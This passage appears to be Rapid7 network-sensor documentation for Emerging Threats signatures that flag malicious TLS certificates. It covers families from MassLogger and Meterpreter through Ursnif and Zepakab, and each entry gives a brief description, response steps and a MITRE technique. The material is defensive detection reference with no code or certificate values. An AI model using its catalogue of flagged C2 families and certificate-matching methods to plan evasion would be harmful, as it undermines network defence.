Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-06-18)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2020-07-29)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Malicious Browser Ext CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MassLogger)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Meterpreter Paranoid Mode CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MICROPSIA CnC Domain)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MINEBRIDGE/MINEDOOR CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Mirrortheif group)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MirrorThief CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Moist Stealer CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MonetizUs/LNKR)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (More_eggs CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MosaicRegressor WinHTTP Downloader)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MSIL/Agent.TRM CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (NHS UK Covid Passport Phish)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OceanLotus APT CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OilRig QUADAGENT CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OSX/AppleJeus Variant CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure for a variant of the macOS malware AppleJeus. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OSX/Nukesped CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure for the macOS malware Nukesped. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (OZH Rat)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by OZH Rat command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Panda Banker C2)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure for the Panda Banker banking trojan. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Panda Banker Injects)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by the server from which Panda Banker infections fetch their web-inject configuration. The match is made on the certificate itself (its subject, issuer or fingerprint). A match indicates an active banking-trojan infection on the source host retrieving injects, not merely a download of the malware.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password, including any banking or financial credentials used from that host.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (PhantomNet/Smanager CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by PhantomNet/Smanager command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (PHPs Labyrinth Stage1 CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by the first-stage command-and-control infrastructure of PHPs Labyrinth. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Possible APT33 CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one associated with command-and-control infrastructure possibly belonging to APT33. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. The attribution is marked as possible in the signature name; treat a match as a lead to be confirmed rather than as a firm attribution. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Possible Godlua CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one associated with command-and-control infrastructure possibly belonging to Godlua. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. The attribution is marked as possible in the signature name; treat a match as a lead to be confirmed rather than as a firm attribution. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (POWERRATANKBA CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by POWERRATANKBA command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (POWERSTATS Proxy CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by a proxy in front of POWERSTATS command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Python RAT (Aurora Campaign))

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by the command-and-control infrastructure of the Python RAT seen in the Aurora campaign. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Quasar CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by Quasar command-and-control infrastructure. Quasar is an open-source .NET remote-access tool, so it is also occasionally run by administrators; confirm who owns the destination before treating the match as hostile. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (RampantKitten CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by RampantKitten command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ReactGet Group)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by infrastructure attributed to the ReactGet group. The match is made on the certificate itself (its subject, issuer or fingerprint), so the endpoint is identified without decrypting the session. Malicious actors use infrastructure of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SedUploader)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by SedUploader command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by ServHelper command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ServHelper RAT CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure for the ServHelper RAT. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ShadowHammer CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by ShadowHammer command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Sidewinder APT CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by Sidewinder APT command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SideWinder APT CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by SideWinder APT command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (Sidewinder CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by Sidewinder command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Silver Implant)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by the Silver implant’s command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (SmokeLoader CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by SmokeLoader command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Strongpity CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by Strongpity command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by StrongPity command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (StrongPity Domain)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate observed on a domain attributed to the StrongPity group. The match is made on the certificate itself (its subject, issuer or fingerprint). The signature name distinguishes these domains from the StrongPity CnC signatures; treat a match as contact with StrongPity infrastructure regardless of the domain’s role. Several signatures in the rule set carry this name.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (TaurusStealer CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by TaurusStealer command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Because this family is an information stealer, a confirmed match means credentials stored on the source host should be treated as exposed.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (TinyNuke Variant CnC) 2020-02-09

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure for a TinyNuke variant. The date is part of the signature name as shipped. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Turla/APT34 CnC Domain)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used on a command-and-control domain associated with Turla and APT34. The signature carries both names because the infrastructure has been associated with both groups; treat a match as contact with hostile infrastructure regardless of which operated it. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Turla CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by Turla command-and-control infrastructure. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Unattributed CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure that has not been attributed to a named family. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. The missing attribution does not lower the confidence of the match, only what is known about the operator. Several signatures in the rule set carry this name.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587


ET MALWARE Observed Malicious SSL Cert (Upatre CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure for the Upatre downloader. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Because Upatre is a downloader, a confirmed match should prompt a search for the second-stage payload it retrieved.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description

This detection fires when Rapid7’s Insight Network Sensor observes a TLS session in which the server presents a certificate matching one known to be used by command-and-control infrastructure for the Ursnif (Gozi) banking trojan. The match is made on the certificate itself (its subject, issuer or fingerprint), so the C2 endpoint is identified without decrypting the session. Several signatures in the rule set carry this name. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question, confirming the destination and the matching certificate and checking whether the source host has contacted it repeatedly rather than once. If the activity is confirmed, isolate the host, rebuild it from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif Inject Domain)

Description

This detection identifies a TLS/SSL certificate associated with a domain that serves Ursnif web injects (the content the trojan injects into victims’ banking sessions), as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Ursnif Injects)

Description

This detection identifies a TLS/SSL certificate associated with Ursnif web-inject delivery infrastructure, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Various CnC)

Description

This detection identifies a TLS/SSL certificate associated with command-and-control (CnC) infrastructure shared by several malware families, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (W32/TrojanDownloader.Agent.FBF Variant CnC)

Description

This detection identifies a TLS/SSL certificate associated with command-and-control (CnC) infrastructure of a W32/TrojanDownloader.Agent.FBF variant, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (WastedLoader CnC)

Description

This detection identifies a TLS/SSL certificate associated with WastedLoader command-and-control (CnC) infrastructure, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Win32/Gadwats Banker CnC Domain)

Description

This detection identifies a TLS/SSL certificate associated with a command-and-control (CnC) domain of the Win32/Gadwats banking trojan, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Win32/SandCat CnC)

Description

This detection identifies a TLS/SSL certificate associated with Win32/SandCat command-and-control (CnC) infrastructure, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Win32/Unk Downloader CnC)

Description

This detection identifies a TLS/SSL certificate associated with command-and-control (CnC) infrastructure of an unidentified Win32 downloader, as observed by Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Zepakab CnC)

Description

